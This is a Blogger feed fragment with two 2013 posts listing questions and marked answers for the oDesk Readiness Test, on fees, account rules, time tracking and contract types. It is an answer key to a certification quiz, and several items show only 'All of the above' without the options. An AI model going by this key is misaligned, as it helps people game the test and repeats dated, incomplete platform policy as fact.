&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question:&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class="apple-converted-space" style="line-height: 10.5pt;"&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;Which of the following statements are correct about oDesk fees?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.&amp;nbsp;&amp;nbsp;All
of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="color: red;"&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;Question:&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;&amp;nbsp;Which of the
following actions are NOT allowed when&amp;nbsp;applying&amp;nbsp;to job postings?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;a.&amp;nbsp;Misrepresenting your skills,
experiences, portfolio, etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;b.&amp;nbsp;Submitting boilerplate, placeholder or
generic bids or other spam&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;c.&amp;nbsp;Disclosing direct contact information&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;d.&amp;nbsp;Applying&amp;nbsp;when you are not truly
qualified&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.&amp;nbsp;&amp;nbsp;All
of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question:&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;&amp;nbsp;Which of the
following are NOT permitted on oDesk?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;a.&amp;nbsp;&amp;nbsp;Sharing a single account between
multiple people&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;b.&amp;nbsp;Opening more than one account on oDesk&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;c.&amp;nbsp;Using a logo or clip art as
your&amp;nbsp;profile&amp;nbsp;portrait&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;d.&amp;nbsp; Using a fake name&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.&amp;nbsp;&amp;nbsp;All
of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question:&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class="apple-converted-space" style="line-height: 10.5pt;"&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;What do you need to do to ensure guaranteed payment on hourly
jobs?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.&amp;nbsp;&amp;nbsp;All
of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question:&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class="apple-converted-space" style="line-height: 10.5pt;"&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;Which of the following break the oDesk user agreement?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.&amp;nbsp;&amp;nbsp;All
of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="color: red;"&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;Question:&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;&amp;nbsp;Which of the
following statements about oDesk fees is FALSE?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;a.&amp;nbsp;&amp;nbsp;The oDesk fee is 10% of the
employer’s payment to oDesk&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;b.&amp;nbsp;&amp;nbsp;oDesk is free to join&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;c.&amp;nbsp;&amp;nbsp;oDesk is free
for&amp;nbsp;contractors&amp;nbsp;to&amp;nbsp;apply&amp;nbsp;and work on jobs&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;d.&amp;nbsp;&amp;nbsp;The
oDesk fee is $2/hour for hourly contracts (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;e.&amp;nbsp;&amp;nbsp;All of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question:&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class="apple-converted-space" style="line-height: 10.5pt;"&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;Buyers set weekly limits on hourly assignments, how do these work?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.&amp;nbsp;&amp;nbsp;All
of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question:&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;&amp;nbsp;The oDesk Team
application Time Tracker records which of the following&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;a.&amp;nbsp;&amp;nbsp;Screenshot of the active
screen once per billing segment&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;b.&amp;nbsp;Number&amp;nbsp;of keystrokes&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;c.&amp;nbsp;&amp;nbsp;Number&amp;nbsp;of&amp;nbsp;mouse clicks&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;d.&amp;nbsp;&amp;nbsp;Memo entered by the contractor&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.&amp;nbsp;&amp;nbsp;All
of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="color: red;"&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;Question:&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span class="apple-converted-space" style="line-height: 10.5pt;"&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;Can I start my own company on oDesk?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;a.
Yes! oDesk allows you to build and manage a team of workers, colleagues and
collaborators. You can even subcontract other workers on oDesk to other
customers oDesk (and take a cut). (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;b. No&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;: How does feedback
work on oDesk?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.&amp;nbsp;&amp;nbsp;All
of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question:&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class="apple-converted-space"&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;Which of the following is TRUE about fixed-price contracts?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;a.
Employer billed automatically each week&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;span style="color: magenta;"&gt;&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;b.
How much to pay and when to pay is at the employer’s discretion&lt;/span&gt;&lt;/strong&gt;&lt;span class="apple-converted-space"&gt;&lt;b&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;strong&gt;&lt;i&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;(Answer)&lt;/span&gt;&lt;/i&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;c. Hours worked will show on your profile&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;d. Time-tracking required&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin-bottom: 0in; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;e. Qualify for the
oDesk payment guarantee&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/7520348177922795024/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=7520348177922795024&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/7520348177922795024?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/7520348177922795024?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2013/01/odesk-readiness-test-for-independent.html' title='ODesk Readiness Test for Independent Contractors and Staffing Managers – Test 2013'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-vQ-x8KpZMMg/UQpicwOeb1I/AAAAAAAAAS4/lyMFzIy-670/s72-c/oDesk.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;D0cFSXs6fSp7ImA9WhNaGEo.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-8243338273268831720</id><published>2013-01-07T13:19:00.002+06:00</published><updated>2013-02-03T13:03:38.515+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2013-02-03T13:03:38.515+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Freelanching'/><category scheme='http://www.blogger.com/atom/ns#' term='Odesk'/><title>ODesk Readiness Test for Agency Contractors Answers 2013</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-6I4XeOJxtPQ/UQ4LrHFyfzI/AAAAAAAAATg/oT4nREk0O_Y/s1600/oDesk.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="199" src="http://3.bp.blogspot.com/-6I4XeOJxtPQ/UQ4LrHFyfzI/AAAAAAAAATg/oT4nREk0O_Y/s320/oDesk.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="border: 1pt none windowtext; font-size: 9px; padding: 0in;"&gt;&lt;span style="color: #cc0000; font-family: Georgia;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span style="color: blue; font-family: Georgia;"&gt; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: blue; font-family: Georgia;"&gt;&lt;span style="font-size: 9px;"&gt;&amp;nbsp; ODesk Readiness Test for Agency Contractors Answers 2013&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;strong style="background-color: transparent;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: #cc0000;"&gt;Question: 1&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;Which of the following
are required for your agency to qualify for guaranteed payment?&lt;/span&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;div&gt;
&lt;div style="background: white; line-height: 12.0pt; margin-bottom: .0001pt; margin: 0in;"&gt;
&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;a. An hourly contract&lt;br /&gt;
b. Tracking your time with the oDesk Team application&lt;br /&gt;
c. Entering relevant memos&lt;br /&gt;
d. An employer with a verified payment method&lt;br /&gt;
e. &lt;span style="color: magenta;"&gt;All of the above&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;span style="color: #cc0000;"&gt;Answer:&lt;/span&gt; All of the above&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: #cc0000;"&gt;Question: 2&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;Which of the following
actions are NOT allowed when applying to job postings?&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="background-color: white; font-family: Verdana; font-size: 8pt; line-height: 12pt;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="background-color: white; font-family: Verdana; font-size: 8pt; line-height: 12pt;"&gt;a. Misrepresenting your
skills, experiences, portfolio, etc.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div style="background: white; line-height: 12.0pt; margin-bottom: .0001pt; margin: 0in;"&gt;
&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;
b. Submitting boilerplate, placeholder or generic bids or other spam&lt;br /&gt;
c. Disclosing direct contact information&lt;br /&gt;
d. Applying when you are not truly qualified&lt;br /&gt;
e. &lt;span style="color: magenta;"&gt;All of the above&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;&lt;span style="color: #cc0000;"&gt;Answer:&lt;/span&gt; All of the above&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;
&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;
&lt;!--[endif]--&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div class="MsoNormal"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: #cc0000;"&gt;Question: 3&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style="font-family: Verdana; font-size: 8pt;"&gt;Which of the following is
TRUE about fixed-price contracts?&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
